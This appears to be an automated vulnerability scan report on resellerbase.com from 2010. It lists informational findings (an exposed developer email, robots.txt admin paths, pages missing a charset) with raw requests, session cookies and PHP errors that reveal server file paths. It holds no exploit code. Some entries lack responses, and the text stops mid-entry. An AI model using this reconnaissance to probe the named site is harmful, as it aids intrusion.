GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

7. Email addresses disclosed previous next
There are 2 instances of this issue:

/themes/kosmos/calendar-en.js
/themes/kosmos/calendar.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

7.1. http://www.resellerbase.com/themes/kosmos/calendar-en.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-en.js

Issue detail

The following email address was disclosed in the response:

mihai_bazon@yahoo.com

Request

GET /themes/kosmos/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:35:22 GMT
ETag: "ab81487-e10-44737fe4bda80"
Accept-Ranges: bytes
Content-Length: 3600
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript

// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Encoding: any
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 i
...[SNIP]...

7.2. http://www.resellerbase.com/themes/kosmos/calendar.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar.js

Issue detail

The following email address was disclosed in the response:

mihai_bazon@yahoo.com

Request

GET /themes/kosmos/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:35:45 GMT
ETag: "ab8144d-860e-44737ffaace40"
Accept-Ranges: bytes
Content-Length: 34318
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript

/* Copyright Mihai Bazon, 2002-2005 | www.bazon.net/mishoo
* -----------------------------------------------------------
*
* The DHTML Calendar, version 1.0 "It is happening again"
*
* Details
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...

8. Private IP addresses disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/googlepr.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.20.30.40

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /googlepr.php?link_id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 1151
Connection: close
Content-Type: image/gif

<br />
<b>Warning</b>: readfile(themes/kosmos/images/pr///www.google.com/terms_of_service.html). In your email, please send us the <b>entire</b> code displayed below. Please also send us
...[SNIP]...
e. My Internet access is through a dial-up account I have with the FooCorp ISP." or "I'm using the Konqueror browser on Linux to search from my job at myFoo.com. My machine's IP address is 10.20.30.40, but all of myFoo's web traffic goes through some kind of proxy server whose IP address is 10.11.12.13." (If you don't know any information like this, that's OK. But this kind of information ca
...[SNIP]...

9. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/robots.txt

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:28 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:48:28 GMT
ETag: "ab81767-155-447382d254300"
Accept-Ranges: bytes
Content-Length: 341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /cp/
Disallow: /add.php
Disallow: /modify.php
Disallow: /upgrade.php
Disallow: /tell_friend.php
Disallow: /send_pwd.php
Disallow: /sendmai
...[SNIP]...

10. HTML does not specify charset previous next
There are 44 instances of this issue:

/add.php/
/adult/media-chat/more2.html
/adult/more2.html
/blocks/
/cgi-bin/
/goods-wholesale/search.php
/other/search.php
/resources-information/ebooks/search.php
/resources-information/search.php
/tag/Outsource+SEO
/tag/Reseller+SEO
/tag/Resellers+SEO
/tag/SEO+Reseller
/tag/SEO+Resellers
/tag/SEO+outsourcing
/tag/SEO+reseller+program
/tag/White+Label+SEO
/tag/downtime+monitor
/tag/dripship
/tag/dropshipping
/tag/email+fax
/tag/nude
/tag/outsource
/tag/reseller
/tag/search+engine+optimisation
/tag/search+engine+optimization
/tag/search+engine+submission
/tag/seo
/tag/ssl+certificates
/tag/survey
/tag/uptime+monitoring
/tag/web+cam+chat
/tag/web+statistics
/tag/webhosting
/tag/website+monitoring
/themes/
/themes/kosmos/
/themes/kosmos/images/
/themes/kosmos/images/pr/
/themes/kosmos/images/rating/
/themes/kosmos/images/review/
/themes/kosmos/images/template_24.gif/
/user_detail.php
/web-service/more2.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

10.1. http://www.resellerbase.com/add.php/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/add.php/

Request

GET /add.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...

10.2. http://www.resellerbase.com/adult/media-chat/more2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Request

GET /adult/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:30:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.3. http://www.resellerbase.com/adult/more2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Request

GET /adult/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:33:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to undefined method stdClass::RecordCount() in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/link.class.php</b> on line <b>0</b><br />

10.4. http://www.resellerbase.com/blocks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/blocks/

Request

GET /blocks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 23:01:37 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /blocks/ on this server.
<HR>
<I>www.r
...[SNIP]...

10.5. http://www.resellerbase.com/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/cgi-bin/

Request

GET /cgi-bin/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Nov 2010 01:16:48 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 484

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /cgi-bin/ on this server.
<HR>
<I>www.
...[SNIP]...

10.6. http://www.resellerbase.com/goods-wholesale/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Request

GET /goods-wholesale/search.php?cat=4&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:41:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.7. http://www.resellerbase.com/other/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/search.php

Request

GET /other/search.php?cat=6&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.8. http://www.resellerbase.com/resources-information/ebooks/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Request

GET /resources-information/ebooks/search.php?cat=9&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.9. http://www.resellerbase.com/resources-information/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Request

GET /resources-information/search.php?cat=10&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.10. http://www.resellerbase.com/tag/Outsource+SEO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Outsource+SEO

Request

GET /tag/Outsource+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.11. http://www.resellerbase.com/tag/Reseller+SEO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Reseller+SEO

Request

GET /tag/Reseller+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.12. http://www.resellerbase.com/tag/Resellers+SEO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Resellers+SEO

Request

GET /tag/Resellers+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.13. http://www.resellerbase.com/tag/SEO+Reseller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Reseller

Request

GET /tag/SEO+Reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.14. http://www.resellerbase.com/tag/SEO+Resellers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Resellers

Request

GET /tag/SEO+Resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

10.15. http://www.resellerbase.com/tag/SEO+outsourcing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+outsourcing

Request

GET /tag/SEO+outsourcing HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

10.16. http://www.resellerbase.com/tag/SEO+reseller+program previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+reseller+program

Request

GET /tag/SEO+reseller+program HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.17. http://www.resellerbase.com/tag/White+Label+SEO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/White+Label+SEO

Request

GET /tag/White+Label+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.18. http://www.resellerbase.com/tag/downtime+monitor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/downtime+monitor

Request

GET /tag/downtime+monitor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.19. http://www.resellerbase.com/tag/dripship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dripship

Request

GET /tag/dripship HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.20. http://www.resellerbase.com/tag/dropshipping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipping

Request

GET /tag/dropshipping HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.21. http://www.resellerbase.com/tag/email+fax previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/email+fax

Request

GET /tag/email+fax HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.22. http://www.resellerbase.com/tag/nude previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/nude

Request

GET /tag/nude HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
